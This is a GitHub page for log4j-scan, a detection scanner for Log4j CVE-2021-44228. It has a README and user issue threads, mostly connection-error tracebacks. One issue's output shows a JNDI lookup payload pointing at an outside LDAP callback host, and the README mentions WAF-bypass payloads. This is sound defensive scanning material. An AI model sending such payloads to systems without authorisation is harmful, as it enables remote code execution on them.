A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228

Overview

log4j-scan

A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

Features

  • Support for lists of URLs.
  • Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools).
  • Fuzzing for HTTP POST Data parameters.
  • Fuzzing for JSON data parameters.
  • Supports DNS callback for vulnerability discovery and validation.
  • WAF Bypass payloads.

Description

We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we worked in preventing this vulnerability with our customers. We are open-sourcing an open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability. This shall be used by security teams to scan their infrastructure for Log4J RCE, and also test for WAF bypasses that can result in achiving code execution on the organization's environment.

It supports DNS OOB callbacks out of the box, there is no need to setup a DNS callback server.

Usage

$ python3 log4j-scan.py -h                                                   
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] [--wait-time WAIT_TIME] [--waf-bypass]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  --request-type REQUEST_TYPE
                        Request Type: (get, post) - [Default: get].
  --headers-file HEADERS_FILE
                        Headers fuzzing list - [default: headers.txt].
  --run-all-tests       Run all available tests on each URL.
  --exclude-user-agent-fuzzing
                        Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.
  --wait-time WAIT_TIME
                        Wait time after all URLs are processed (in seconds) - [Default: 5].
  --waf-bypass          Extend scans with WAF bypass payloads.

Scan a Single URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

Discover WAF bypasses on the environment.

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

Scan a list of URLs

$ python3 log4j-scan.py -l urls.txt

Installation

$ pip3 install -r requirements.txt

About FullHunt

FullHunt is the next-generation attack surface management platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.

FullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

Mazin Ahmed

Comments
  • Error when trying to scan hosts

    Error when trying to scan hosts

    Greetings,

    I'm receiving this output when I tried to scan an specific host with log4j. This is the command that I used.

    python3 log4j-scan.py -u http://ip-address

    My python version: Python 3.8.10

    I also installed the requirements

    The error output: [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 662, in urlopen self._prepare_proxy(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 950, in _prepare_proxy conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 322, in connect self._tunnel() File "/usr/lib/python3.8/http/client.py", line 901, in _tunnel raise OSError("Tunnel connection failed: %d %s" % (code, OSError: Tunnel connection failed: 403 Forbidden

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 403 Forbidden')))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "log4j-scan.py", line 386, in main() File "log4j-scan.py", line 356, in main dns_callback = Interactsh() File "log4j-scan.py", line 215, in init self.register() File "log4j-scan.py", line 223, in register res = self.session.post( File "/usr/lib/python3/dist-packages/requests/sessions.py", line 581, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 533, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 646, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3/dist-packages/requests/adapters.py", line 510, in send raise ProxyError(e, request=request) requests.exceptions.ProxyError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 403 Forbidden')))

    opened by alessandronva 11
  • EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)

    EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). [%] Checking for Log4j RCE CVE-2021-44228. [•] URL: http://URLTOBESCANNED [•] URL: http://URLTOBESCANNED | PAYLOAD: ${jndi:ldap://[snip].interact.sh/chef93i} EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4) [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks. [•] Waiting... [•] Targets does not seem to be vulnerable.

    I try to scan an get the message in the title. it says the prxy does not respond. then it goes on to say that it scanned. so did the scan work or did it fail?

    opened by mansam-ger 10
  • Dockerfile - error while/after Initiating DNS callbeack server (interact.sh)

    Dockerfile - error while/after Initiating DNS callbeack server (interact.sh)

    Hi!

    I'm using the Dockerfile - as it is - from this repo.

    i tired the startparameter "-h" first: WORKS. after that, for testing i tried the startparameter "-u https://google.de" (or any other url)

    now my output looks like this:

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    
    [•] Secure your External Attack Surface with FullHunt.io.
    
    [•] Initiating DNS callback server (interact.sh).
    
    Traceback (most recent call last):
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
    
        httplib_response = self._make_request(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
    
        self._validate_conn(conn)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
    
        conn.connect()
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 416, in connect
    
        self.sock = ssl_wrap_socket(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
    
        ssl_sock = _ssl_wrap_socket_impl(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
    
        return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
    
      File "/usr/local/lib/python3.10/ssl.py", line 512, in wrap_socket
    
        return self.sslsocket_class._create(
    
      File "/usr/local/lib/python3.10/ssl.py", line 1070, in _create
    
        self.do_handshake()
    
      File "/usr/local/lib/python3.10/ssl.py", line 1341, in do_handshake
    
        self._sslobj.do_handshake()
    
    ConnectionResetError: [Errno 104] Connection reset by peer
    
    
    
    During handling of the above exception, another exception occurred:
    
    
    
    Traceback (most recent call last):
    
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 439, in send
    
        resp = conn.urlopen(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 755, in urlopen
    
        retries = retries.increment(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/retry.py", line 532, in increment
    
        raise six.reraise(type(error), error, _stacktrace)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/packages/six.py", line 769, in reraise
    
        raise value.with_traceback(tb)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
    
        httplib_response = self._make_request(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
    
        self._validate_conn(conn)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
    
        conn.connect()
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 416, in connect
    
        self.sock = ssl_wrap_socket(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
    
        ssl_sock = _ssl_wrap_socket_impl(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
    
        return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
    
      File "/usr/local/lib/python3.10/ssl.py", line 512, in wrap_socket
    
        return self.sslsocket_class._create(
    
      File "/usr/local/lib/python3.10/ssl.py", line 1070, in _create
    
        self.do_handshake()
    
      File "/usr/local/lib/python3.10/ssl.py", line 1341, in do_handshake
    
        self._sslobj.do_handshake()
    
    urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
    
    
    
    During handling of the above exception, another exception occurred:
    
    
    
    Traceback (most recent call last):
    
      File "/app/log4j-scan.py", line 349, in <module>
    
        main()
    
      File "/app/log4j-scan.py", line 319, in main
    
        dns_callback = Interactsh()
    
      File "/app/log4j-scan.py", line 185, in __init__
    
        self.register()
    
      File "/app/log4j-scan.py", line 193, in register
    
        res = self.session.post(
    
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 590, in post
    
        return self.request('POST', url, data=data, json=json, **kwargs)
    
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 542, in request
    
        resp = self.send(prep, **send_kwargs)
    
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 655, in send
    
        r = adapter.send(request, **kwargs)
    
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 498, in send
    
        raise ConnectionError(err, request=request)
    
    requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
    
    opened by NopeNix 7
  • Error DNS callback server

    Error DNS callback server

    [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/home/kali/log4j-scan/log4j-scan.py", line 335, in main() File "/home/kali/log4j-scan/log4j-scan.py", line 305, in main dns_callback = Interactsh() File "/home/kali/log4j-scan/log4j-scan.py", line 156, in init rsa = RSA.generate(2048) File "/usr/local/lib/python3.9/dist-packages/Crypto/PublicKey/RSA.py", line 508, in generate obj = _RSA.generate_py(bits, rf, progress_func, e) # TODO: Don't use legacy _RSA module File "/usr/local/lib/python3.9/dist-packages/Crypto/PublicKey/_RSA.py", line 50, in generate_py p = pubkey.getStrongPrime(bits>>1, obj.e, 1e-12, randfunc) File "/usr/local/lib/python3.9/dist-packages/Crypto/Util/number.py", line 264, in getStrongPrime return _fastmath.getStrongPrime(int(N), int(e), false_positive_prob, File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read return self._singleton.read(bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read return self._singleton.read(bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read return self._singleton.read(bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 178, in read return _UserFriendlyRNG.read(self, bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 129, in read self._ec.collect() File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 77, in collect t = time.clock() AttributeError: module 'time' has no attribute 'clock'

    opened by jagadeeshjs8895 7
  • Error initializing DNS callback server

    Error initializing DNS callback server

    [•] Initiating DNS callback server.
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 174, in _new_conn
        conn = connection.create_connection(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/connection.py", line 96, in create_connection
        raise err
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/connection.py", line 86, in create_connection
        sock.connect(sa)
    socket.timeout: timed out
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 394, in _make_request
        conn.request(method, url, **httplib_request_kw)
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 239, in request
        super(HTTPConnection, self).request(method, url, body=body, headers=headers)
      File "/usr/lib/python3.9/http/client.py", line 1285, in request
        self._send_request(method, url, body, headers, encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1331, in _send_request
        self.endheaders(body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1280, in endheaders
        self._send_output(message_body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1040, in _send_output
        self.send(msg)
      File "/usr/lib/python3.9/http/client.py", line 980, in send
        self.connect()
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 205, in connect
        conn = self._new_conn()
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 179, in _new_conn
        raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)')
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 755, in urlopen
        retries = retries.increment(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/retry.py", line 574, in increment
        raise MaxRetryError(_pool, url, error or ResponseError(cause))
    urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='www.dnslog.cn', port=80): Max retries exceeded with url: /getdomain.php (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)'))
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 238, in <module>
        main()
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 217, in main
        dns_callback = Dnslog()
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 127, in __init__
        req = self.s.get("http://www.dnslog.cn/getdomain.php", timeout=30)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 555, in get
        return self.request('GET', url, **kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 542, in request
        resp = self.send(prep, **send_kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 655, in send
        r = adapter.send(request, **kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/adapters.py", line 504, in send
        raise ConnectTimeout(e, request=request)
    requests.exceptions.ConnectTimeout: HTTPConnectionPool(host='www.dnslog.cn', port=80): Max retries exceeded with url: /getdomain.php (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)'))
    
    
    opened by pdelteil 7
  • [EXCEPTIONS] ConnectionError

    [EXCEPTIONS] ConnectionError

    Hello, I'm facing this issue can anybody help me with this?

    requests.exceptions.ConnectionError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7faa56dd0c18>: Failed to establish a new connection: [Errno 111] Connection refused',))

    opened by sokobban 6
  • [•] Initiating DNS callback server (interact.sh). Error

    [•] Initiating DNS callback server (interact.sh). Error

    I've tried running the script and docker container today and I've been getting:

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
        conn = connection.create_connection(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/connection.py", line 96, in create_connection
        raise err
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/connection.py", line 86, in create_connection
        sock.connect(sa)
    TimeoutError: timed out
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
        self._validate_conn(conn)
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
        conn.connect()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 358, in connect
        conn = self._new_conn()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
        raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)')
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 755, in urlopen
        retries = retries.increment(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/retry.py", line 574, in increment
        raise MaxRetryError(_pool, url, error or ResponseError(cause))
    urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)'))
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/app/log4j-scan.py", line 412, in <module>
        main()
      File "/app/log4j-scan.py", line 382, in main
        dns_callback = Interactsh()
      File "/app/log4j-scan.py", line 239, in __init__
        self.register()
      File "/app/log4j-scan.py", line 247, in register
        res = self.session.post(
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 590, in post
        return self.request('POST', url, data=data, json=json, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 542, in request
        resp = self.send(prep, **send_kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 655, in send
        r = adapter.send(request, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 504, in send
        raise ConnectTimeout(e, request=request)
    requests.exceptions.ConnectTimeout: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)'))
    
    

    Is there something I'm doing wrong?

    Thank you, Pete

    opened by mirtec001 5
  • DNS callback error:

    DNS callback error: "Connection reset by peer"

    Hi, I cannot get this to work, and I don't see my issue posted. Any help would be appreciated, thank you.

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 600, in urlopen chunked=chunked) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 343, in _make_request self._validate_conn(conn) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 839, in validate_conn conn.connect() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 358, in connect ssl_context=context) File "/usr/lib/python3.6/site-packages/urllib3/util/ssl.py", line 354, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib64/python3.6/ssl.py", line 365, in wrap_socket _context=self, _session=session) File "/usr/lib64/python3.6/ssl.py", line 776, in init self.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 1036, in do_handshake self._sslobj.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 648, in do_handshake self._sslobj.do_handshake() ConnectionResetError: [Errno 104] Connection reset by peer

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 449, in send timeout=timeout File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 638, in urlopen _stacktrace=sys.exc_info()[2]) File "/usr/lib/python3.6/site-packages/urllib3/util/retry.py", line 368, in increment raise six.reraise(type(error), error, _stacktrace) File "/usr/lib/python3.6/site-packages/urllib3/packages/six.py", line 692, in reraise raise value.with_traceback(tb) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 600, in urlopen chunked=chunked) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 343, in _make_request self._validate_conn(conn) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 839, in validate_conn conn.connect() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 358, in connect ssl_context=context) File "/usr/lib/python3.6/site-packages/urllib3/util/ssl.py", line 354, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib64/python3.6/ssl.py", line 365, in wrap_socket _context=self, _session=session) File "/usr/lib64/python3.6/ssl.py", line 776, in init self.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 1036, in do_handshake self._sslobj.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 648, in do_handshake self._sslobj.do_handshake() urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "log4j-scan.py", line 365, in main() File "log4j-scan.py", line 335, in main dns_callback = Interactsh() File "log4j-scan.py", line 195, in init self.register() File "log4j-scan.py", line 204, in register f"https://{self.server}/register", headers=self.headers, json=data, timeout=30) File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 581, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 533, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 646, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 498, in send raise ConnectionError(err, request=request) requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    opened by lgaalswyk 5
  • Crypto.Cipher import AES, PKCS1_OAEP

    Crypto.Cipher import AES, PKCS1_OAEP

    File "/home/parallels/Log4j-RCE-Scanner/log4j-scan/log4j-scan.py", line 22, in from Crypto.Cipher import AES, PKCS1_OAEP ModuleNotFoundError: No module named 'Crypto'

    opened by ehsan235 5
  • AttributeError: module 'time' has no attribute 'clock' when running with Python 3.9.9

    AttributeError: module 'time' has no attribute 'clock' when running with Python 3.9.9

    I'm getting this stack trace when launching with

    > python3 --version
    Python 3.9.9
    > uname -v 
    Darwin Kernel Version 19.6.0: Tue Jun 22 19:49:55 PDT 2021; root:xnu-6153.141.35~1/RELEASE_X86_64
    
    > python3 log4j-scan.py -u https://myservice.com --run-all-tests
    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 336, in <module>
        main()
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 306, in main
        dns_callback = Interactsh()
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 156, in __init__
        rsa = RSA.generate(2048)
      File "/usr/local/lib/python3.9/site-packages/Crypto/PublicKey/RSA.py", line 508, in generate
        obj = _RSA.generate_py(bits, rf, progress_func, e)    # TODO: Don't use legacy _RSA module
      File "/usr/local/lib/python3.9/site-packages/Crypto/PublicKey/_RSA.py", line 50, in generate_py
        p = pubkey.getStrongPrime(bits>>1, obj.e, 1e-12, randfunc)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Util/number.py", line 264, in getStrongPrime
        return _fastmath.getStrongPrime(int(N), int(e), false_positive_prob,
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 178, in read
        return _UserFriendlyRNG.read(self, bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 129, in read
        self._ec.collect()
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 77, in collect
        t = time.clock()
    AttributeError: module 'time' has no attribute 'clock'
    

    Seems to be due to this:

    The function time.clock() has been removed, after having been deprecated since Python 3.3: use time.perf_counter() or time.process_time() instead, depending on your requirements, to have well-defined behavior.
    
    opened by chroche 5
  • Error on a first run

    Error on a first run

    When you run command: python3 log4j-scan.py -h

    you get the error message: File "log4j-scan.py", line 132 fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'

    opened by YanDatsiuk 4
  • Addressed issue

    Addressed issue "interact.sh server unavailable #131"

    Added '--disable-tls-to-register-dns' arg to fix communication issue with interact.sh. Also added a validation when pulling the logs in case data_list is None

    opened by hackercat3211 0
  • interact.sh server unavailable

    interact.sh server unavailable

    HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f284db3a350>: Failed to establish a new connection: [Errno 111] Connection refused'))

    opened by ademighty24 8
  • Fix issue on interact.sh `pull_logs` function ('NoneType' object is not iterable)

    Fix issue on interact.sh `pull_logs` function ('NoneType' object is not iterable)

    Add a null check before iterating in pull_logs to avoid this error:

    [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
    [•] Waiting...
        main()
      File "/app/log4j-scan.py", line 401, in main
        records = dns_callback.pull_logs()
      File "/app/log4j-scan.py", line 257, in pull_logs
        for i in data_list:
    TypeError: 'NoneType' object is not iterable
    
    opened by pierre42100 0
  • Syntax error in code. Please advise

    Syntax error in code. Please advise

    if "Referer" in fuzzing_headers: fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}' return fuzzing_headers

    This section of code produces a syntax error which is annoying, can you please help me fix this.

    Peter fuzzingerror

    opened by Morpheyous 1
  • requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    python3 log4j-scan.py -u https://vcenter7.******.***.**/ui/login #Local server

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 376, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 996, in validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 366, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl.py", line 370, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.8/ssl.py", line 500, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.8/ssl.py", line 1040, in _create self.do_handshake() File "/usr/lib/python3.8/ssl.py", line 1309, in do_handshake self._sslobj.do_handshake() ConnectionResetError: [Errno 104] Connection reset by peer

    During handling of the above exception, another exception occurred:

